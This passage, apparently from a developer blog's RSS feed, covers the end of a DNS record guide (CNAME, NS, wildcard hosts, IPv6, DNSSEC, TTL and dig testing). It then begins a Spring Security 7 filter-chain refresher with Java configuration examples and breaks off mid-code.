<p>Your CDN provider can manage the underlying infrastructure while you keep a simple CNAME in your DNS.</p> <h3 id="the-cname-gotcha">The CNAME Gotcha</h3> <p>Here’s something that trips people up constantly: <strong>you cannot use a CNAME alongside other records for the same hostname</strong>.</p> <p>This is <strong>invalid</strong>:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>example.com A 192.0.2.1 example.com CNAME somewhere.else.com ❌ CONFLICT! </code></pre></div></div> <p>But this is <strong>fine</strong>:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>example.com A 192.0.2.1 www.example.com CNAME example.com ✅ Different hostnames </code></pre></div></div> <p>Why? The DNS specification requires that a CNAME record be the only record for that exact name. It’s an exclusive relationship.</p> <h1 id="ns-record-the-authority-delegation">NS Record: The Authority Delegation</h1> <p>NS records (Name Server records) are meta-records—they control which DNS servers are authoritative for your domain.</p> <p><strong>What it does:</strong> Specifies which nameservers handle DNS queries for your domain</p> <p><strong>Why it matters:</strong> These records determine where all DNS lookups for your domain are sent</p> <p><strong>Example:</strong></p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>example.com NS ns1.dnsprovider.com example.com NS ns2.dnsprovider.com </code></pre></div></div> <h3 id="how-ns-records-work">How NS Records Work</h3> <p>When someone queries your domain:</p> <ol> <li>Their DNS resolver asks the root DNS servers “Who handles <code class="language-plaintext highlighter-rouge">.com</code>?”</li> <li>Root servers respond with the <code class="language-plaintext highlighter-rouge">.com</code> TLD nameservers</li> <li>The resolver asks TLD servers “Who handles <code class="language-plaintext highlighter-rouge">example.com</code>?”</li> <li>TLD servers respond with your NS records: <code class="language-plaintext highlighter-rouge">ns1.dnsprovider.com</code> and <code class="language-plaintext highlighter-rouge">ns2.dnsprovider.com</code></li> <li>The resolver finally asks those nameservers for the actual A, AAAA, CNAME records</li> </ol> <p><strong>Key insight:</strong> NS records are like forwarding addresses. They tell the world “For anything about this domain, ask these servers.”</p> <h3 id="multiple-nameservers-redundancy">Multiple Nameservers: Redundancy</h3> <p>You’ll typically see 2-4 NS records for reliability:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>example.com NS ns1.dnsprovider.com example.com NS ns2.dnsprovider.com example.com NS ns3.dnsprovider.com example.com NS ns4.dnsprovider.com </code></pre></div></div> <p>If one nameserver goes down, the others can still respond. This is critical for availability.</p> <h1 id="understanding-the-host-field--www-and-">Understanding the Host Field: @, www, and *</h1> <p>When you’re configuring DNS, the “host” or “name” field can be confusing. Let’s demystify the common symbols:</p> <h3 id="the--symbol-root-domain">The @ Symbol (Root Domain)</h3> <p><code class="language-plaintext highlighter-rouge">@</code> represents your root domain—the domain itself without any subdomain prefix.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>@ A 192.0.2.1 </code></pre></div></div> <p>This creates a record for <code class="language-plaintext highlighter-rouge">example.com</code> (not <code class="language-plaintext highlighter-rouge">subdomain.example.com</code>).</p> <h3 id="the-www-prefix">The www Prefix</h3> <p>This is the classic subdomain for web services:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>www CNAME example.com </code></pre></div></div> <p>Creates a record for <code class="language-plaintext highlighter-rouge">www.example.com</code> pointing to <code class="language-plaintext highlighter-rouge">example.com</code>.</p> <h3 id="the--wildcard">The * Wildcard</h3> <p>The wildcard matches any subdomain that doesn’t have a specific record:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>* A 192.0.2.1 </code></pre></div></div> <p>This means <code class="language-plaintext highlighter-rouge">anything.example.com</code> will resolve to <code class="language-plaintext highlighter-rouge">192.0.2.1</code> unless there’s a more specific record.</p> <p><strong>Example with specifics:</strong></p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>example.com A 192.0.2.1 www.example.com CNAME example.com api.example.com A 192.0.2.2 * A 192.0.2.1 </code></pre></div></div> <p>Results:</p> <ul> <li><code class="language-plaintext highlighter-rouge">example.com</code> → 192.0.2.1 (root A record)</li> <li><code class="language-plaintext highlighter-rouge">www.example.com</code> → 192.0.2.1 (CNAME to root)</li> <li><code class="language-plaintext highlighter-rouge">api.example.com</code> → 192.0.2.2 (specific A record)</li> <li><code class="language-plaintext highlighter-rouge">random.example.com</code> → 192.0.2.1 (wildcard catches it)</li> <li><code class="language-plaintext highlighter-rouge">foo.bar.example.com</code> → 192.0.2.1 (wildcard catches it)</li> </ul> <h3 id="common-host-field-patterns">Common Host Field Patterns</h3> <table> <thead> <tr> <th>Host</th> <th>Creates</th> <th>Common Use</th> </tr> </thead> <tbody> <tr> <td><code class="language-plaintext highlighter-rouge">@</code></td> <td>example.com</td> <td>Root domain</td> </tr> <tr> <td><code class="language-plaintext highlighter-rouge">www</code></td> <td>www.example.com</td> <td>Web services</td> </tr> <tr> <td><code class="language-plaintext highlighter-rouge">mail</code></td> <td>mail.example.com</td> <td>Mail server</td> </tr> <tr> <td><code class="language-plaintext highlighter-rouge">api</code></td> <td>api.example.com</td> <td>API endpoint</td> </tr> <tr> <td><code class="language-plaintext highlighter-rouge">ftp</code></td> <td>ftp.example.com</td> <td>File transfer</td> </tr> <tr> <td><code class="language-plaintext highlighter-rouge">*</code></td> <td>*.example.com</td> <td>Wildcard catchall</td> </tr> </tbody> </table> <script async="" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- 컨텐츠내 --> <p><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3234744071843247" data-ad-slot="1671969273" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></p> <h1 id="industry-trends-whats-happening-now">Industry Trends: What’s Happening Now</h1> <h3 id="cloud-native-dns-services">Cloud-Native DNS Services</h3> <p>Traditional DNS hosting is giving way to cloud-native solutions. AWS Route 53, Cloudflare DNS, and Google Cloud DNS offer:</p> <ul> <li><strong>Global distribution:</strong> Faster lookups from anywhere</li> <li><strong>Advanced traffic management:</strong> Geolocation routing, weighted routing</li> <li><strong>Integrated security:</strong> Built-in DDoS protection, DNSSEC</li> <li><strong>Programmable infrastructure:</strong> Manage DNS via API</li> </ul> <p>If you’re running anything beyond a hobby project, using a specialized DNS service is practically mandatory now.</p> <h3 id="cdn-integration-is-standard">CDN Integration is Standard</h3> <p>Every major website uses CDN services like Cloudflare, Akamai, or Fastly. CNAME records make this integration trivial:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cdn.example.com CNAME example.cdn.cloudflare.net </code></pre></div></div> <p>Your CDN provider handles the global edge network while you maintain a simple DNS record.</p> <h3 id="ipv6-adoption-is-accelerating">IPv6 Adoption is Accelerating</h3> <p>According to Google’s IPv6 statistics, over 40% of users now access their services via IPv6. For mobile networks, it’s even higher—often 70-80%.</p> <p><strong>Reality check:</strong> If you’re launching a mobile app or targeting markets with high mobile penetration (like India, China, or most of Asia), IPv6 isn’t optional anymore.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>example.com A 203.0.113.10 # IPv4 example.com AAAA 2001:db8::1 # IPv6 </code></pre></div></div> <p>Run both. Always.</p> <h3 id="dns-security-dnssec-is-going-mainstream">DNS Security (DNSSEC) is Going Mainstream</h3> <p>DNSSEC adds cryptographic signatures to DNS records, preventing spoofing attacks. Major TLDs (<code class="language-plaintext highlighter-rouge">.com</code>, <code class="language-plaintext highlighter-rouge">.net</code>, <code class="language-plaintext highlighter-rouge">.org</code>) support it, and hosting providers are making it easier to enable.</p> <p>Without DNSSEC, an attacker could redirect <code class="language-plaintext highlighter-rouge">yourbank.com</code> to their fake site. With DNSSEC, such tampering is cryptographically provable and rejected.</p> <h1 id="practical-tips-getting-it-right">Practical Tips: Getting It Right</h1> <h3 id="for-new-projects-short-term-strategy">For New Projects (Short-Term Strategy)</h3> <ol> <li><strong>Start with the basics:</strong> Set up A records and one CNAME for www <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>example.com A 192.0.2.1 www.example.com CNAME example.com </code></pre></div> </div> </li> <li><strong>Add IPv6 early:</strong> Don’t wait until you “need” it <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>example.com AAAA 2001:db8::1 </code></pre></div> </div> </li> <li> <p><strong>Use a proper DNS provider:</strong> Don’t rely on your domain registrar’s free DNS—it’s often slow and limited</p> </li> <li><strong>Set reasonable TTLs:</strong> During initial setup, use short TTLs (300 seconds) so mistakes can be corrected quickly</li> </ol> <h3 id="for-growing-services-long-term-strategy">For Growing Services (Long-Term Strategy)</h3> <ol> <li><strong>Choose enterprise DNS:</strong> Evaluate AWS Route 53, Cloudflare, or Google Cloud DNS based on: <ul> <li>Global presence</li> <li>Security features (DDoS protection, DNSSEC)</li> <li>Traffic routing capabilities</li> <li>API integration for automation</li> </ul> </li> <li> <p><strong>Implement monitoring:</strong> DNS downtime is total downtime. Monitor your NS records and query response times</p> </li> <li> <p><strong>Plan for IPv6 transition:</strong> Government agencies, large enterprises, and global services should aggressively adopt IPv6</p> </li> <li> <p><strong>Enable DNSSEC:</strong> Especially for financial services, healthcare, or any site handling sensitive data</p> </li> <li><strong>Document your DNS architecture:</strong> Future you (or your successor) will thank you</li> </ol> <h3 id="a-real-world-example-e-commerce-site">A Real-World Example: E-Commerce Site</h3> <p>Let’s say you’re building <code class="language-plaintext highlighter-rouge">shop.example.com</code> with these requirements:</p> <ul> <li>Main site on AWS</li> <li>CDN for static assets</li> <li>Separate API server</li> <li>Email via Google Workspace</li> <li>IPv4 and IPv6 support</li> </ul> <p>Your DNS configuration might look like:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>; Root domain example.com A 203.0.113.10 example.com AAAA 2001:db8::1 ; Web services www.example.com CNAME example.com shop.example.com A 203.0.113.20 shop.example.com AAAA 2001:db8::2 ; CDN for assets cdn.example.com CNAME shop.cloudfront.net ; API server api.example.com A 203.0.113.30 api.example.com AAAA 2001:db8::3 ; Email (MX records - not covered here, but you get the idea) example.com MX 10 aspmx.l.google.com ; Nameservers example.com NS ns1.dnsprovider.com example.com NS ns2.dnsprovider.com example.com NS ns3.dnsprovider.com </code></pre></div></div> <h1 id="common-mistakes-to-avoid">Common Mistakes to Avoid</h1> <h3 id="mistake-1-using-cname-at-the-root">Mistake 1: Using CNAME at the Root</h3> <p>This is <strong>wrong</strong>:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>example.com CNAME somewhere.else.com ❌ </code></pre></div></div> <p>The DNS specification doesn’t allow CNAME at the apex (root) domain because it conflicts with required records like NS and SOA.</p> <p><strong>Solution:</strong> Use an A record at the root, or use your DNS provider’s ALIAS/ANAME feature if available.</p> <h3 id="mistake-2-forgetting-about-ttl">Mistake 2: Forgetting About TTL</h3> <p>TTL (Time To Live) controls how long DNS records are cached. Setting it too high means changes take forever to propagate. Too low means unnecessary load on your DNS servers.</p> <p><strong>Good practice:</strong></p> <ul> <li>During active development: 300 seconds (5 minutes)</li> <li>For stable production: 3600 seconds (1 hour)</li> <li>Before making changes: Lower TTL 24 hours in advance</li> </ul> <h3 id="mistake-3-not-having-redundant-nameservers">Mistake 3: Not Having Redundant Nameservers</h3> <p>Relying on a single NS record is asking for trouble. Always have at least two, preferably on different networks:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>example.com NS ns1.dnsprovider.com example.com NS ns2.dnsprovider.com </code></pre></div></div> <h3 id="mistake-4-ignoring-ipv6">Mistake 4: Ignoring IPv6</h3> <p>“Nobody uses IPv6 yet” is simply false. A significant portion of mobile users are IPv6-only or IPv6-preferred. If you’re not providing AAAA records, you’re degrading their experience or blocking them entirely.</p> <h1 id="testing-your-dns-configuration">Testing Your DNS Configuration</h1> <p>Before you call it done, test your configuration:</p> <h3 id="using-dig-command-line">Using dig (Command Line)</h3> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Check A record</span> dig example.com A <span class="c"># Check AAAA record</span> dig example.com AAAA <span class="c"># Check NS records</span> dig example.com NS <span class="c"># Check CNAME</span> dig www.example.com CNAME <span class="c"># Full trace (see the entire resolution path)</span> dig +trace example.com </code></pre></div></div> <h3 id="using-nslookup-windows">Using nslookup (Windows)</h3> <pre><code class="language-cmd">nslookup example.com </code></pre> <h3 id="online-tools">Online Tools</h3> <ul> <li><strong>DNS Checker:</strong> dnschecker.org - Check propagation globally</li> <li><strong>What’s My DNS:</strong> whatsmydns.net - See DNS responses from different locations</li> <li><strong>DNS Lookup:</strong> mxtoolbox.com - Comprehensive DNS testing</li> </ul> <h1 id="wrapping-up">Wrapping Up</h1> <p>DNS essentials in a nutshell:</p> <ol> <li><strong>A records:</strong> Domain → IPv4 address (the foundation)</li> <li><strong>AAAA records:</strong> Domain → IPv6 address (the future)</li> <li><strong>CNAME records:</strong> Domain alias (the convenience)</li> <li><strong>NS records:</strong> Nameserver delegation (the meta-layer)</li> </ol> <p>Remember:</p> <ul> <li>Always use multiple NS records for redundancy</li> <li>Deploy both A and AAAA records for compatibility</li> <li>CNAME can’t coexist with other records for the same host</li> <li>Test everything before going live</li> <li>Use enterprise DNS for production workloads</li> </ul> <p>DNS might seem like plumbing—invisible infrastructure nobody thinks about—but when it breaks, everything stops. Take the time to understand it properly, and you’ll save yourself (and your users) from a world of pain.</p> <p>Bookmark this page for the next time you’re staring at that DNS configuration panel wondering what all those acronyms mean. You’ll thank yourself later! 🚀</p> <p><strong>Subscribe <a href="/feed.xml">via RSS</a></strong></p> <script async="" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- 컨텐츠내 --> <p><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3234744071843247" data-ad-slot="1671969273" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></p> Tue, 13 Jan 2026 10:50:00 +0900 http://thecodinglog.github.io/networking/2026/01/13/dns-record-guide.html http://thecodinglog.github.io/networking/2026/01/13/dns-record-guide.html Networking Networking Spring Security - Your Memory Refresher Guide 🔐 <p>Ever opened up a Spring Security config after a few months away and thought “Wait, what does this even do?” You’re not alone. All those filter chains and security matchers can get jumbled up in your head pretty quickly. This guide will help you rebuild that mental model with Spring Security 7’s core architecture.</p> <script async="" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- 컨텐츠내 --> <p><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3234744071843247" data-ad-slot="1671969273" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></p> <h2 id="the-foundation-understanding-servlet-filters">The Foundation: Understanding Servlet Filters</h2> <p>Before diving into Spring Security, let’s talk about servlet filters—they’re the foundation everything else builds on.</p> <p>When a client sends an HTTP request, the servlet container creates a <code class="language-plaintext highlighter-rouge">FilterChain</code> containing <code class="language-plaintext highlighter-rouge">Filter</code> instances and a final <code class="language-plaintext highlighter-rouge">Servlet</code> (in Spring MVC, that’s the <code class="language-plaintext highlighter-rouge">DispatcherServlet</code>).</p> <p>Filters can do two main things:</p> <ul> <li>Block the request from reaching downstream filters or the servlet (usually by writing the response directly)</li> <li>Modify the request or response before passing it along</li> </ul> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">@Override</span> <span class="kd">public</span> <span class="kt">void</span> <span class="nf">doFilter</span><span class="o">(</span><span class="nc">ServletRequest</span> <span class="n">request</span><span class="o">,</span> <span class="nc">ServletResponse</span> <span class="n">response</span><span class="o">,</span> <span class="nc">FilterChain</span> <span class="n">chain</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">IOException</span><span class="o">,</span> <span class="nc">ServletException</span> <span class="o">{</span> <span class="c1">// Do something before</span> <span class="n">chain</span><span class="o">.</span><span class="na">doFilter</span><span class="o">(</span><span class="n">request</span><span class="o">,</span> <span class="n">response</span><span class="o">);</span> <span class="c1">// Pass it along</span> <span class="c1">// Do something after</span> <span class="o">}</span> </code></pre></div></div> <p>Here’s the kicker: <strong>filter order matters. A lot.</strong> Filters execute sequentially, and each one only affects what comes after it.</p> <h2 id="delegatingfilterproxy-bridging-two-worlds">DelegatingFilterProxy: Bridging Two Worlds</h2> <p>Here’s a problem: servlet containers register filters using their own standards, but they don’t know anything about Spring beans.</p> <p>Enter <code class="language-plaintext highlighter-rouge">DelegatingFilterProxy</code>. It registers with the servlet container but delegates all the actual work to a Spring bean that implements <code class="language-plaintext highlighter-rouge">Filter</code>.</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">public</span> <span class="kt">void</span> <span class="nf">doFilter</span><span class="o">(</span><span class="nc">ServletRequest</span> <span class="n">request</span><span class="o">,</span> <span class="nc">ServletResponse</span> <span class="n">response</span><span class="o">,</span> <span class="nc">FilterChain</span> <span class="n">chain</span><span class="o">)</span> <span class="o">{</span> <span class="nc">Filter</span> <span class="n">delegate</span> <span class="o">=</span> <span class="n">getFilterBean</span><span class="o">(</span><span class="n">someBeanName</span><span class="o">);</span> <span class="c1">// Get the Spring bean</span> <span class="n">delegate</span><span class="o">.</span><span class="na">doFilter</span><span class="o">(</span><span class="n">request</span><span class="o">,</span> <span class="n">response</span><span class="o">);</span> <span class="c1">// Delegate the work</span> <span class="o">}</span> </code></pre></div></div> <p>Bonus: this allows lazy loading of filter beans. The container needs filters registered early, but Spring beans load later via <code class="language-plaintext highlighter-rouge">ContextLoaderListener</code>.</p> <h2 id="filterchainproxy-where-the-magic-happens">FilterChainProxy: Where the Magic Happens</h2> <p>All of Spring Security’s servlet support lives inside <code class="language-plaintext highlighter-rouge">FilterChainProxy</code>. It’s a special filter that can delegate to multiple filter instances through <code class="language-plaintext highlighter-rouge">SecurityFilterChain</code>. Since <code class="language-plaintext highlighter-rouge">FilterChainProxy</code> is a bean, it’s typically wrapped in a <code class="language-plaintext highlighter-rouge">DelegatingFilterProxy</code>.</p> <p>Why <code class="language-plaintext highlighter-rouge">FilterChainProxy</code> rocks:</p> <ul> <li><strong>Single entry point</strong> for all Spring Security servlet support (perfect spot for debugging breakpoints)</li> <li><strong>Clears the SecurityContext</strong> to prevent memory leaks</li> <li><strong>Applies HttpFirewall</strong> to protect against certain attacks</li> <li><strong>Flexible matching</strong> based on anything in the <code class="language-plaintext highlighter-rouge">HttpServletRequest</code>, not just the URL</li> </ul> <h2 id="securityfilterchain-the-actual-filters">SecurityFilterChain: The Actual Filters</h2> <p><code class="language-plaintext highlighter-rouge">SecurityFilterChain</code> determines which Spring Security filters should execute for a given request.</p> <p>You can have multiple <code class="language-plaintext highlighter-rouge">SecurityFilterChain</code> instances in one application. <code class="language-plaintext highlighter-rouge">FilterChainProxy</code> picks the right one, and here’s the important part: <strong>only the first matching chain executes.</strong></p> <p>Example flow:</p> <ul> <li>Request to <code class="language-plaintext highlighter-rouge">/api/messages/</code> → matches <code class="language-plaintext highlighter-rouge">/api/**</code> pattern in <code class="language-plaintext highlighter-rouge">SecurityFilterChain0</code> → executes that chain only</li> <li>Request to <code class="language-plaintext highlighter-rouge">/messages/</code> → doesn’t match <code class="language-plaintext highlighter-rouge">SecurityFilterChain0</code> → tries next chains</li> </ul> <p>Each <code class="language-plaintext highlighter-rouge">SecurityFilterChain</code> is independently configurable with different numbers of filters. You can even have a chain with zero filters if you want Spring Security to ignore certain requests.</p> <h2 id="security-filters-order-matters">Security Filters: Order Matters</h2> <p>Security filters execute in a specific order. Authentication filters must run before authorization filters, for instance.</p> <p>Check out this configuration:</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">@Configuration</span> <span class="nd">@EnableWebSecurity</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">SecurityConfig</span> <span class="o">{</span> <span class="nd">@Bean</span> <span class="kd">public</span> <span class="nc">SecurityFilterChain</span> <span class="nf">filterChain</span><span class="o">(</span><span class="nc">HttpSecurity</span> <span class="n">http</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">Exception</span> <span class="o">{</span> <span class="n">http</span> <span class="o">.</span><span class="na">csrf</span><span class="o">(</span><span class="nc">Customizer</span><span class="o">.</span><span class="na">withDefaults</span><span class="o">())</span> <span class="o">.</span><span class="na">httpBasic</span><span class="o">(</span><span class="nc">Customizer</span><span class="o">.</span><span class="na">withDefaults</span><span class="o">())</span> <span class="o">.</span><span class="na">formLogin</span><span class="o">(</span><span class="nc">Customizer</span><span class="o">.</span><span class="na">withDefaults</span><span class="o">())</span> <span class="o">.</span><span class="na">authorizeHttpRequests</span><span class="o">((</span><span class="n">authorize</span><span class="o">)</span> <span class="o">-&gt;</span> <span class="n">authorize</span> <span class="o">.</span><span class="na">anyRequest</span><span class="o">().</span><span class="na">authenticated</span><span class="o">()</span> <span class="o">);</span> <span class="k">return</span> <span class="n">http</span><span class="o">.</span><span class="na">build</span><span class="o">();</span> <span class="o">}</span> <span class="o">}</span> </code></pre></div></div> <p>This creates the following filter order:</p> <ol> <li><code class="language-plaintext highlighter-rouge">CsrfFilter</code> - CSRF attack protection</li> <li><code class="language-plaintext highlighter-rouge">BasicAuthenticationFilter</code> - HTTP Basic authentication</li> <li><code class="language-plaintext highlighter-rouge">UsernamePasswordAuthenticationFilter</code> - Form login authentication</li> <li><code class="language-plaintext highlighter-rouge">AuthorizationFilter</code> - Authorization</li> </ol> <h2 id="getting-started-the-basics">Getting Started: The Basics</h2> <p>The most basic Spring Security configuration looks like this:</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">@Configuration</span> <span class="nd">@EnableWebSecurity</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">WebSecurityConfig</span> <span class="o">{</span> <span class="nd">@Bean</span> <span class="kd">public</span> <span class="nc">UserDetailsService</span> <span class="nf">userDetailsService</span><span class="o">()</span> <span class="o">{</span> <span class="nc">InMemoryUserDetailsManager</span> <span class="n">manager</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">InMemoryUserDetailsManager</span><span class="o">();</span> <span class="n">manager</span><span class="o">.</span><span class="na">createUser</span><span class="o">(</span><span class="nc">User</span><span class="o">.</span><span class="na">withDefaultPasswordEncoder</span><span class="o">()</span> <span class="o">.</span><span class="na">username</span><span class="o">(</span><span class="s">"user"</span><span class="o">)</span> <span class="o">.</span><span class="na">password</span><span class="o">(</span><span class="s">"password"</span><span class="o">)</span> <span class="o">.</span><span class="na">roles</span><span class="o">(</span><span class="s">"USER"</span><span class="o">)</span> <span class="o">.</span><span class="na">build</span><span class="o">());</span> <span class="k">return</span> <span class="n">manager</span><span class="o">;</span> <span class="o">}</span> <span class="o">}</span> </code></pre></div></div> <p>This simple config gives you:</p> <ul> <li>Authentication required for all URLs</li> <li>Auto-generated login form</li> <li>Form-based authentication</li> <li>Logout support</li> <li>CSRF attack prevention</li> <li>Session fixation protection</li> <li>Security header integration (HSTS, X-Content-Type-Options, etc.)</li> <li>Servlet API method integration</li> </ul> <p>Not bad for a few lines of code!</p> <h2 id="httpsecurity-fine-grained-control">HttpSecurity: Fine-Grained Control</h2> <p>That basic config actually creates this <code class="language-plaintext highlighter-rouge">SecurityFilterChain</code> behind the scenes:</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">@Bean</span> <span class="kd">public</span> <span class="nc">SecurityFilterChain</span> <span class="nf">filterChain</span><span class="o">(</span><span class="nc">HttpSecurity</span> <span class="n">http</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">Exception</span> <span class="o">{</span> <span class="n">http</span> <span class="o">.</span><span class="na">authorizeHttpRequests</span><span class="o">((</span><span class="n">authorize</span><span class="o">)</span> <span class="o">-&gt;</span> <span class="n">authorize</span> <span class="o">.</span><span class="na">anyRequest</span><span class="o">().</span><span class="na">authenticated</span><span class="o">()</span> <span class="o">)</span> <span class="o">.</span><span class="na">formLogin</span><span class="o">(</span><span class="nc">Customizer</span><span class="o">.</span><span class="na">withDefaults</span><span class="o">())</span> <span class="o">.</span><span class="na">httpBasic</span><span class="o">(</span><span class="nc">Customizer</span><span class="o">.</span><span class="na">withDefaults</span><span class="o">());</span> <span class="k">return</span> <span class="n">http</span><span class="o">.</span><span class="na">build</span><span class="o">();</span> <span class="o">}</span> </code></pre></div></div> <p>This setup:</p> <ul> <li>Requires authentication for every request</li> <li>Enables form login</li> <li>Enables HTTP Basic authentication</li> </ul> <h2 id="multiple-httpsecurity-different-rules-for-different-areas">Multiple HttpSecurity: Different Rules for Different Areas</h2> <p>Real applications often need different security configurations for different parts. Just register multiple <code class="language-plaintext highlighter-rouge">SecurityFilterChain</code> beans:</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">@Configuration</span> <span class="nd">@EnableWebSecurity</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">MultiHttpSecurityConfig</span> <span class="o">{</span> <span class="nd">@Bean</span> <span class="kd">public</span> <span class="nc">UserDetailsService</span> <span class="nf">userDetailsService</span><span class="o">()</span> <span class="o">{</span> <span class="nc">UserBuilder</span> <span class="n">users</span> <span class="o">=</span> <span class="nc">User</span><span class="o">.</span><span class="na">withDefaultPasswordEncoder</span><span class="o">();</span> <span class="nc">InMemoryUserDetailsManager</span> <span class="n">manager</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">InMemoryUserDetailsManager</span><span class="o">();</span> <span class="n">manager</span><span class="o">.</span><span class="na">createUser</span><span class="o">(</span><span class="n">users</span><span class="o">.</span><span class="na">username</span><span class="o">(</span><span class="s">"user"</span><span class="o">).</span><span class="na">password</span><span class="o">(</span><span class="s">"password"</span><span class="o">).</span><span class="na">roles</span><span class="o">(</span><span class="s">"USER"</span><span class="o">).</span><span class="na">build</span><span class="o">());</span> <span class="n">manager</span><span class="o">.</span><span class="na">createUser</span><span class="o">(</span><span class="n">users</span><span class="o">.</span><span class="na">username</span><span class="o">(</span><span class="s">"admin"</span><span class="o">).</span><span class="na">password</span><span class="o">(</span><span class="s">"password"</span><span class="o">).</span><span class="na">roles</span><span class="o">(</span><span class="s">"USER"</span><span class="o">,</span><span class="s">"ADMIN"</span><span class="o">).</span><span class="na">build</span><span class="o">());</span> <span class="k">return</span> <span class="n">manager</span><span class="o">;</span> <span class="o">}</span> <span class="nd">@Bean</span> <span class="nd">@Order</span><span class="o">(</span><span class="mi">1</span><span class="o">)</span> <span class="c1">// Higher priority</span> <span class="kd">public</span> <span class="nc">SecurityFilterChain</span> <span class="nf">apiFilterChain</span><span class="o">(</span><span class="nc">HttpSecurity</span> <span class="n">http</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">Exception</span> <span class="o">{</span> <span class="n">http</span> <span class="o">.</span><span class="na">securityMatcher</span><span class="o">(</span><span class="s">"/api/**"</span><span class="o">)</span> <span class="c1">// Only applies to /api/**</span> <span class="o">.</span><span class="na">authorizeHttpRequests</span><span class="o">((</span><span class="n">authorize</span><span class="o">)</span> <span class="o">-&gt;</span> <span class="n">authorize</span> <span class="o">.</span><span class="na">anyRequest</span><span class="o">().</span><span class="na">hasRole</span><span class="o">(</span><span class="s">"ADMIN"</span><span class="o">)</span> <span class="o">)</span> <span class="o">.</span><span class="na">httpBasic</span><span class="o">(</span><span class="nc">Customizer</span><span class="o">.</span><span class="na">withDefaults</span><span class="o">());</span> <span class="k">return</span> <span class="n">http</span><span class="o">.</span><span class="na">build</span><span class="o">();</span> <span class="o">}</span> <span class="nd">@Bean</span> <span class="c1">// No @Order = lowest priority</span> <span class="kd">public</span> <span class="nc">SecurityFilterChain</span> <span class="nf">formLoginFilterChain</span><span class="o">(</span><span class="nc">HttpSecurity</span> <span class="n">http</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">Exception</span> <span class="o">{</span> <span class="n">http</span> <span class="o">.</span><span class="na">authorizeHttpRequests</span><span class="o">((</span><span class="n">authorize</span><span class="o">)</span> <span class="o">-&gt;</span> <span class="n">authorize</span> <span class="o">.</span><span class="na">anyRequest</span><span class="o">().</span><span class="na">authenticated</span><span class="o">()</span> <span class="o">)</span> <span class="o">.</span><span class="na">formLogin</span><span class="o">(</span><span class="nc">Customizer</span><span class="o">.</span><span class="na">withDefaults</span><span class="o">());</span> <span class="k">return</span> <span class="n">http</span><span class="o">.</span><span class="na">build</span><span class="o">();</span> <span class="o">}</span> <span class="o">}</span> </code></pre></div></div> <h2 id="securitymatcher-vs-requestmatchers-know-the-difference">securityMatcher vs requestMatchers: Know the Difference</h2> <p>This trips people up all the time:</p> <ul> <li><code class="language-plaintext highlighter-rouge">http.securityMatcher()</code>: Determines which requests this entire <code class="language-plaintext highlighter-rouge">SecurityFilterChain</code> applies to</li> <li><code class="language-plaintext highlighter-rouge">requestMatchers()</code>: Determines which requests individual authorization rules apply to within the chain</li> </ul> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">@Bean</span> <span class="kd">public</span> <span class="nc">SecurityFilterChain</span> <span class="nf">securedFilterChain</span><span class="o">(</span><span class="nc">HttpSecurity</span> <span class="n">http</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">Exception</span> <span class="o">{</span> <span class="n">http</span> <span class="o">.</span><span class="na">securityMatcher</span><span class="o">(</span><span class="s">"/secured/**"</span><span class="o">)</span> <span class="c1">// Chain applies to /secured/** only</span> <span class="o">.</span><span class="na">authorizeHttpRequests</span><span class="o">((</span><span class="n">authorize</span><span class="o">)</span> <span class="o">-&gt;</span> <span class="n">authorize</span> <span class="o">.</span><span class="na">requestMatchers</span><span class="o">(</span><span class="s">"/secured/user"</span><span class="o">).</span><span class="na">hasRole</span><span 